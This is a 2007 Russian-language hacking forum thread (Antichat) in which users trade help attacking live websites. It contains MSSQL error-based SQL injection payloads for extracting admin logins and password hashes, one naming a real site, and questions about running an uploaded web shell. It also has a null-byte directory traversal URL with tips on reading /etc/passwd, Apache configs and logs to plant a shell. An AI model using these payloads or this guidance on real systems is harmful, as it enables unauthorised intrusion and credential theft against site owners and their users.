HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.08.2007, 20:19
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию

На Insert Into скорее всего нет прав, а Update не прокатит ибо после юноина тока селект мона и подзапросы все тоже с селектом только
__________________
 
Ответить с цитированием

  #2  
Старый 25.08.2007, 08:28
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!
 
Ответить с цитированием

  #3  
Старый 25.08.2007, 09:51
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами: 9982591

Репутация: 29
По умолчанию

Цитата:
Сообщение от Ded MustD!e  
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!
Аналогичная ситуация (uralsmart.ru) тока кого спрашиал - никто не помог...Там конф видать не дает вывод делать...
Так что все...
 
Ответить с цитированием

  #4  
Старый 25.08.2007, 10:12
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

Цитата:
Сообщение от Ded MustD!e  
Не могу понять что происходит с MSSQL, я узнал что в таблице есть 2 нужных мне значения Login и PassHash, делаю запрос

1+or+1=(SELECT+TOP+1+Login+from+admin)--

он успешно выполняется, я вижу логин, затем пишу

1+or+1=(SELECT+TOP+1+PassHash+from+admin)--

и меня перекидывает на страницу новостей, хотя адресс в строке браузера не менялся

Помогите, плиз!
для начала попробуй так:
Код:
1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
но скорее всего так:
Код:
1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qwerty')+from+admin)--
в таком случае твой хеш это то что будет идти до qwerty
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #5  
Старый 25.08.2007, 10:54
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами: 10274726

Репутация: 1917


По умолчанию

значит первое значение passhash пустое... пробуй следующий логин...

ЗЫ кстати тут convert() наверное не нужен
ЗЗЫ Еслиб линк бы сразу дал, меньше бы флуда было
ЗЗЗЫ Или в асю мне стучи... посмотрим че там...
__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 25.08.2007 в 11:02..
 
Ответить с цитированием

  #6  
Старый 25.08.2007, 12:14
Реджис
Познающий
Регистрация: 02.05.2007
Сообщений: 55
С нами: 10014183

Репутация: 107
По умолчанию

Доброго дня)
Возникла проблема с заливкой шела в движке Insart.Content
Имеется полный доступ к админке, есть возможность загрузки любых файлов, в том числе и *.php. Но, система отказывается выполнять код, а просто выводит его на экран => не полчается запустить шелл.
Двиг на asp. Ссылку на загруженный шел формирует вида: getfile.asp?id={3AC9A519-4730-4C84-81AB-8A59A69A3F0C}
Какие могут быть пути решения данной проблемы?
 
Ответить с цитированием

  #7  
Старый 27.08.2007, 04:48
noisia
Познающий
Регистрация: 13.03.2007
Сообщений: 55
С нами: 10085912

Репутация: 17
По умолчанию

Query failed: Table 'mobolan.config' doesn't exist

оно само прописует mobolan, таблица конфиг точно есть!!!
 
Ответить с цитированием

  #8  
Старый 27.08.2007, 06:24
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

на запрос логина админа сервер выдал мне:

Код:
4Ruket&ebUSPaPhAf#stUchUthE4EBU+AVEq_dravEbREk$Zud#trat$us?EcaqE
а на пароль:

Код:
az#NAf7A!uw9e&h#cHANej_pr*hupr-yaChe@$u!uthUthesabatRuQEq+4r&crU&
Первый раз с этим столкнулся, вопрос, что ЭТО?
 
Ответить с цитированием

  #9  
Старый 27.08.2007, 07:47
mindw0rk
Познающий
Регистрация: 08.06.2007
Сообщений: 75
С нами: 9960850

Репутация: 76
По умолчанию

Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?

Буду оч признателен за подсказку.
 
Ответить с цитированием

  #10  
Старый 27.08.2007, 09:18
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Цитата:
Сообщение от mindw0rk  
Есть вопрос по читалке файлов. Докопал я, значит, до http://site.com/index.php?ctr=../../index.php%00
Выводится пустая страница только когда я пробую открыть сам индекс через него же.
Показывает другие файлы из рут директории, но пхп файлы обрабатываются интерпретатором PHP. Вопросы -
1 Возможно ли потянуть исходники пхп файлов?
2 Как можно и возможно ли просмотреть содержимое директорий через этот dir trav?
3 Чего стоящего стоит еще почитать на сервере кроме etc/passwd и логов баша?
4 Есть ли альтернативный метод инклуда пхп файла, кроме как с нулевым байтом на конце, путем без расширения, с ? на конце и просто адресом к исходнику?
5 Есть у кого набор самых часто используемых путей до /htdocs в юниксе?

Буду оч признателен за подсказку.
Ничего странного, если, предположим, в index.php код <?php include $ctr; ?> , то результат вполне ожидаем.
1. нет, если они с расширением php, с другими расширениями должно заинклудиться.
2. как правило, нет. можно конечно написать эксплоит для этого инклуда, который будет брутить имена файлов, но это глупо.
3. зависит от сервера. я бы порекомендовал залить шелл, почитав error.log (о том, как это сделать, читай на форуме). ну и конфиг апача (httpd.conf)
4. ...
5. смотри статью Единички "У природы нет плохой погоды", а также ищи на форуме.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...